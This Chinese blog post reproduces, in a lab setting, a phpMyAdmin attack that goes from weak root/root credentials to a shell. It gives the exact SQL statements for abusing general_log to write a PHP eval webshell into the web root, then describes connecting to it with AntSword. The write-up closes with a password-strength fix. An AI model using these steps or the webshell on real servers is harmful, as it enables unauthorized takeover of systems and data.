phpmyadmin弱口令至getshell 漏洞复现
01 环境部署
(1)phpStudy
phpStudy 是一款用于进行 PHP 环境调试的程序集成软件包。在软件安装后便
启动了 MySQL 服务、Apache 服务、PHP 设置等模块,是一款便捷的 PHP 环境调试工具。
本靶场中将使用 YXCMS 作为 Windows 7 边界服务器上开启的 Web 应用。
(2)phpMyAdmin
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。
02 漏洞配置
暴力破解是专用于密码的破解方法,其破解方式为对密码进行逐个猜测,直至推算到正确密码为止。它通常在网站登录系统上被使用,通过锁定已知的管理员的账户名,对其可能的登录密码进行逐个尝试破解。
在攻击者进行测试的时候,通常的攻击方式是,首先寻找到网站后台登录页面。再使用 BurpSuite 捕获登录行为数据包,将该数据包转发到 Intruder 利用模块,并将其密码参数设置为变量,将有效载荷添加入攻击列表开始攻击,而后观察返回包的字节长度,以此判断是否攻击成功。
该漏洞可能造成的风险是:攻击者利用弱口令登录网站管理员后台,以管理员权限进行恶意破坏。
攻击者会使用弱口令等方式对phpMyAdmin进行登录尝试,登录成功后通过SQL查询获取敏感数据,或者使用phpMyAdmin写入webshell,从而获取服务器权限。
本靶场配置了 phpmyadmin 管理员账号 root/root 默认弱口令
03 利用方式
攻击者成功利用弱口令root/root登录phpmyadmin 后台后,利用 SQL 语句 show variables like ‘%general%’;查看general log 是否开启
若发现日志读写功能关闭,于是使用 SQL 语句:SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’;打开general_log 日志读写功能。
打开日志读写功能后,根据图中 general_log_file 中的绝对路径制作一个木马文件:SET GLOBAL general_log_file=‘C:/phpStudy/www/shell.php’
接着往 shell.php 写入 SELECT ’<?php eval($_POST["jkxy"]);?>
利用中国蚁剑工具连接一句话 shell.php,连接测试成功,打开虚拟终端,输入命令 whoami,发现命令执行成功。
至此攻击者通过phpmyadmin弱口令至getshell,成功获取服务器权限。
04 修复方案
及时修改mysql的root用户口令,确保密码强度符合要求,建议大小写字母+数字+特殊字符+8位以上。
- 点赞
- 收藏
- 关注作者
评论(0)